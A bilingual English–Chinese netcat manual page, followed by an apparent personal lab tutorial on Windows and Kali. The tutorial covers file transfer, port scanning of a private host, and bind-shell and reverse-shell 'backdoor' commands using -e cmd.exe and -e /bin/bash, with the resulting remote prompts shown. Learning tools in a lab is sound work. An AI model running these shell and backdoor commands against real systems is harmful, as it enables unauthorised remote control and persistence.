"""
NC(1) General Commands Manual 通用命令手冊
NAME
nc - TCP/IP swiss army knife TCP/IP瑞士軍刀
SYNOPSIS 概要
nc [-options] hostname port[s] [ports] ...
nc -l -p port [-options] [hostname] [port]
DESCRIPTION 描述
netcat is a simple unix utility which reads and writes data across net‐
work connections, using TCP or UDP protocol. It is designed to be a re‐
liable "back-end" tool that can be used directly or easily driven by
other programs and scripts. At the same time, it is a feature-rich
network debugging and exploration tool, since it can create almost any
kind of connection you would need and has several interesting built-in
capabilities. Netcat, or "nc" as the actual program is named, should
have been supplied long ago as another one of those cryptic but stan‐
dard Unix tools.
Netcat是一個簡單的Unix實用程序,它使用TCP或UDP協議跨網絡連接讀取和寫入數據。
它被設計成一個可靠的“後端”工具,可以直接使用,也可以很容易地由其他程序和腳本驅動。
同時它是一個功能豐富的網絡調試和探索工具,因爲它可以創建您需要的幾乎任何類型的連接,
並且具有幾個有趣的內置功能。Netcat,或實際程序名爲“NC”,
早就應該作爲另一種神祕但標準的Unix工具提供。
In the simplest usage, "nc host port" creates a TCP connection to the
given port on the given target host. Your standard input is then sent
to the host, and anything that comes back across the connection is sent
to your standard output. This continues indefinitely, until the net‐
work side of the connection shuts down. Note that this behavior is
different from most other applications which shut everything down and
exit after an end-of-file on the standard input.
在最簡單的用法中,“nc host port”創建到給定目標主機上給定端口的TCP連接。
然後將標準輸入發送到主機,並且通過連接返回的任何內容都將發送到標準輸出。
這將無限期地持續下去,直到連接的網絡端關閉。請注意,此行爲與大多數其他應用程序不同,
這些應用程序在標準輸入的文件結束後關閉所有內容並退出。
Netcat can also function as a server, by listening for inbound connec‐
tions on arbitrary ports and then doing the same reading and writing.
With minor limitations, netcat doesn't really care if it runs in
"client" or "server" mode -- it still shovels data back and forth until
there isn't any more left. In either mode, shutdown can be forced after
a configurable time of inactivity on the network side.
Netcat還可以充當服務器,通過偵聽任意端口上的入站連接,然後進行相同的讀取和寫入。
由於有一些小的限制,Netcat並不真正關心它是在“客戶端”模式還是“服務器”模式下運行——
它仍然來回推送數據,直到沒有更多的數據留下。
在任一模式下,都可以在網絡側可配置的不活動時間後強制關機。
And it can do this via UDP too, so netcat is possibly the "udp telnet-
like" application you always wanted for testing your UDP-mode servers.
UDP, as the "U" implies, gives less reliable data transmission than TCP
connections and some systems may have trouble sending large amounts of
data that way, but it's still a useful capability to have.
而且它也可以通過UDP做到這一點,所以Netcat可能是您一直希望用於測試UDP模式服務器
的“UDP telnetlike”應用程序。
正如“U”所示,UDP提供的數據傳輸不如TCP連接可靠,一些系統可能無法以這種方式發送
大量數據,但它仍然是一種有用的功能。
You may be asking "why not just use telnet to connect to arbitrary
ports?" Valid question, and here are some reasons. Telnet has the
"standard input EOF" problem, so one must introduce calculated delays
in driving scripts to allow network output to finish. This is the main
reason netcat stays running until the *network* side closes. Telnet
also will not transfer arbitrary binary data, because certain charac‐
ters are interpreted as telnet options and are thus removed from the
data stream. Telnet also emits some of its diagnostic messages to
standard output, where netcat keeps such things religiously separated
from its *output* and will never modify any of the real data in transit
unless you *really* want it to. And of course telnet is incapable of
listening for inbound connections, or using UDP instead. Netcat
doesn't have any of these limitations, is much smaller and faster than
telnet, and has many other advantages.
您可能會問“爲什麼不直接使用telnet連接到任意端口?”有效的問題,這裏有一些原因。
Telnet存在“標準輸入EOF”問題,因此必須在驅動腳本中引入計算延遲,以便完成網絡輸出。
這是Netcat保持運行直到*network*端關閉的主要原因。Telnet也不會傳輸任意二進制數據,
因爲某些字符被解釋爲telnet選項,因此會從數據流中刪除。Telnet還會將一些診斷消息
發送到標準輸出,在標準輸出中,Netcat會將這些信息與其*輸出*嚴格分開,並且除非
您*真的*想要修改,否則永遠不會修改傳輸中的任何真實數據。當然,telnet不能偵聽入站連接,
也不能使用UDP。Netcat沒有任何這些限制,它比telnet小得多,速度也快得多,還有很多其他優勢。
OPTIONS
-c string specify shell commands to exec after connect (use with
字符串 caution). The string is passed to /bin/sh -c for execu‐
tion. See the -e option if you don't have a working
/bin/sh (Note that POSIX-conformant system must have one).
在連接後指定要執行的shell命令(謹慎使用)。 該字符串將傳遞給
/bin/sh -c以供執行。 如果沒有工作/bin/sh,請參閱-e選項
(請注意,符合POSIX的系統必須具有一個)。
-e filename specify filename to exec after connect (use with caution).
文件名 See the -c option for enhanced functionality.
filename指定連接後exec的文件名(請謹慎使用)。有關增強功能,請參閱-c選項。
-g gateway source-routing hop point[s], up to 8
網關 源路由跳躍點[s],最多8個
-G num source-routing pointer: 4, 8, 12, ...
數字 源路由指針
-h display help
顯示幫助
-i secs delay interval for lines sent, ports scanned
秒 發送每一行數據或端口掃描的延遲間隔
-l listen mode, for inbound connects
-L 可以在客戶端結束連接的時候繼續監聽
監聽模式,用於入站連接
-n numeric-only IP addresses, no DNS
僅限數字的IP地址,沒有DNS
-o file hex dump of traffic 十六進制展示
-p port local port number (port numbers can be individual or
ranges: lo-hi [inclusive])
本地端口號(端口號可以是單個的或範圍:lo-hi [包含])
-q seconds after EOF on stdin, wait the specified number of seconds
秒 and then quit. If seconds is negative, wait forever.
在標準輸入上執行EOF後,等待指定的秒數然後退出。 如果秒是負數,則永遠等待。
-b allow UDP broadcasts 允許UDP廣播
-r randomize local and remote ports 隨機化本地和遠程端口,隨便開的端口監聽吧
-s addr local source address 本地源地址,用來欺騙
-t enable telnet negotiation 啓用telnet協商
-u UDP mode UDP模式
-v verbose [use twice to be more verbose] 詳細[使用兩次更詳細]
-w secs timeout for connects and final net reads 連接超時和最終網絡讀取
-C Send CRLF as line-ending 將CRLF作爲行尾發送
-z zero-I/O mode [used for scanning] 零I / O模式[用於掃描]
-T type set TOS flag (type may be one of "Minimize-Delay", "Maxi‐
mize-Throughput", "Maximize-Reliability", or "Minimize-
Cost".)
設置TOS標誌(類型可以是“最小化延遲”,“最大化吞吐量”,
“最大化可靠性”或“最小化成本”之一。)
COPYRIGHT 版權
Netcat is entirely my own creation, although plenty of other code was
used as examples. It is freely given away to the Internet community in
the hope that it will be useful, with no restrictions except giving
credit where it is due. No GPLs, Berkeley copyrights or any of that
nonsense. The author assumes NO responsibility for how anyone uses it.
If netcat makes you rich somehow and you're feeling generous, mail me a
check. If you are affiliated in any way with Microsoft Network, get a
life. Always ski in control. Comments, questions, and patches to hob‐
[email protected].
儘管使用了大量其他代碼作爲示例,但Netcat完全是我自己的創建。
它是免費贈送給互聯網社區的,希望它有用,沒有任何限制,除非給予應有的信用。
沒有GPL,伯克利版權或任何廢話。 作者對任何人使用它不承擔任何責任。
如果netcat以某種方式使你富有並且你很慷慨,請給我發一張支票。
如果您以任何方式加入Microsoft Network獲得生命。 總是控制滑雪。
[email protected]的評論,問題和補丁。
NOTES 筆記
Some port names in /etc/services contain hyphens -- netcat currently
will not correctly parse those unless you escape the hyphens with back‐
slashes (e.g. "netcat localhost 'ftp\-data'").
/etc/services中的某些端口名稱包含連字符 - 除非您使用反斜槓轉義連字符
(例如“netcat localhost'ftp \-data'”),否則netcat當前將無法正確解析這些連字符。
BUGS
Efforts have been made to have netcat "do the right thing" in all its
various modes. If you believe that it is doing the wrong thing under
whatever circumstances, please notify me and tell me how you think it
should behave. If netcat is not able to do some task you think up, mi‐
nor tweaks to the code will probably fix that. It provides a basic and
easily-modified template for writing other network applications, and I
certainly encourage people to make custom mods and send in any improve‐
ments they make to it. Continued feedback from the Internet community
is always welcome!
EXAMPLES
For several netcat recipes, please see /usr/share/doc/netcat/README.gz
and /usr/share/doc/netcat/README.Debian.gz.
AUTHOR
This manual page was written by Joey Hess <[email protected]> and Robert
Woodcock <[email protected]>, cribbing heavily from Netcat's README file.
Netcat was written by a guy we know as the Hobbit <[email protected]>.
NC(1)
下載地址:https://eternallybored.org/misc/netcat/
附上一些simple(windows-64):
- 開啓服務端:
打開一個窗口
F:\SecTools\apps\netcat-win32-1.12>nc64 -l -p 4444
(同意防火牆選項)這個時候服務的已經開啓了
- 連接到服務端
然後再打開一個窗口輸入
# 請以自己的ip爲準
F:\SecTools\apps\netcat-win32-1.12>nc64 10.20.3.129 4444
這個時候雖然沒有回顯和提示但是已經連接成功了,隨便輸入點東西
客戶端發的消息會被服務端輸出,服務端發送的消息會被客戶端輸出
- 開啓一個shell服務端
F:\SecTools\apps\netcat-win32-1.12>nc64 -l -p 4444 -e cmd.exe
- 連接上去
sanqiushu@DESKTOP-343EN6M:~$ nc 10.20.3.129 4444
Microsoft Windows [汾 10.0.17134.885]
(c) 2018 Microsoft CorporationȨ
F:\SecTools\apps\netcat-win32-1.12>
連接上去之後直接返回了一個命令行(爲了換個路徑,我使用了linux版的nc)
F:\SecTools\apps\netcat-win32-1.12>dir
dir
F еľ ʱ
к 1646-F9AD
F:\SecTools\apps\netcat-win32-1.12 Ŀ¼
2019/08/14 15:08 <DIR> .
2019/08/14 15:08 <DIR> ..
2004/12/28 12:23 12,166 doexec.c
1996/07/09 17:01 7,283 generic.h
1996/11/06 23:40 22,784 getopt.c
1994/11/03 20:07 4,765 getopt.h
1998/02/06 16:50 61,780 hobbit.txt
2004/12/27 18:37 18,009 license.txt
2011/09/17 00:46 300 Makefile
2019/08/14 14:42 4 nc.bat
2011/09/17 00:52 38,616 nc.exe
2011/09/17 00:52 45,272 nc64.exe
2011/09/17 00:44 69,850 netcat.c
2011/09/17 00:45 6,885 readme.txt
12 ļ 287,714 ֽ
2 Ŀ¼ 199,469,047,808 ֽ
F:\SecTools\apps\netcat-win32-1.12>
可以直接執行命令(但是這中文亂碼很頭疼)看來以後還是windows連windows,linux連linux吧
- 傳輸文件
服務端接受文件
F:\SecTools\apps\netcat-win32-1.12>nc64 -l -p 4444 >F:\SecTools\apps\netcat-win32-1.12\readme2.txt
客戶端發送文件
F:\SecTools\apps\netcat-win32-1.12>nc64 10.20.3.129 4444 < F:\SecTools\apps\netcat-win32-1.12\readme.txt
雖然兩邊都沒啥反應,但是傳輸已經完成了
爲什麼windows的要用絕對路徑啊
linux發送端好像也要絕對路徑???
客戶端接收文件
F:\SecTools\apps\netcat-win32-1.12>nc64 10.20.3.129 4444 > F:\SecTools\apps\netcat-win32-1.12\readme3.txt
服務器端發送文件
F:\SecTools\apps\netcat-win32-1.12>nc64 -l -p 4444 < F:\SecTools\apps\netcat-win32-1.12\readme.txt
可以使用-w5 這樣的參數設置等待時間,如果網絡延遲超過5s還沒連接好,那麼結束命令
這個掃描端口windows版nc的掃描速度真是絕了,掃完感覺人都涼了
ubuntu上的也不行
但是kali-linux上的nc就非常厲害了
root@Sanqiushu:~# nc -z -v -n 10.20.7.7 1-65535
(UNKNOWN) [10.20.7.7] 8080 (http-alt) open
(UNKNOWN) [10.20.7.7] 7001 (afs3-callback) open
(UNKNOWN) [10.20.7.7] 22 (ssh) open
root@Sanqiushu:~#
掃描一次全端口竟然沒用2分鐘
root@Sanqiushu:~# echo "" | nc -v -n 10.20.7.7 1-65535
(UNKNOWN) [10.20.7.7] 8080 (http-alt) open
(UNKNOWN) [10.20.7.7] 7001 (afs3-callback) open
(UNKNOWN) [10.20.7.7] 22 (ssh) open
SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3
Protocol mismatch.
root@Sanqiushu:~#
有些服務不回覆banner信息
- 建立監聽型後門
F:\SecTools\apps\netcat-win32-1.12>nc -l -p 4444 -e cmd.exe
- 建立連接型後面(反彈型)
服務端開啓監聽
F:\SecTools\apps\netcat-win32-1.12>nc -l -p 4444
客戶端連接
F:\SecTools\apps\netcat-win32-1.12>nc64 10.20.3.129 4444 -e cmd.exe
客戶端連接上去以後服務端返回了命令行終端
Microsoft Windows [版本 10.0.17134.885]
(c) 2018 Microsoft Corporation。保留所有權利。
F:\SecTools\apps\netcat-win32-1.12>
windows端開啓服務
F:\SecTools\apps\netcat-win32-1.12>nc -l -p 4444
kali連接
root@Sanqiushu:~# nc 10.20.3.129 4444 -e /bin/bash
雖然沒啥返回,但是已經返回shell了,可以直接運行命令(輸入錯誤的命令你這邊是看不到提示的,真是奇怪),有些linux的nc是沒有-e選項的比如ubuntu
使用 -d 參數讓nc再後臺運行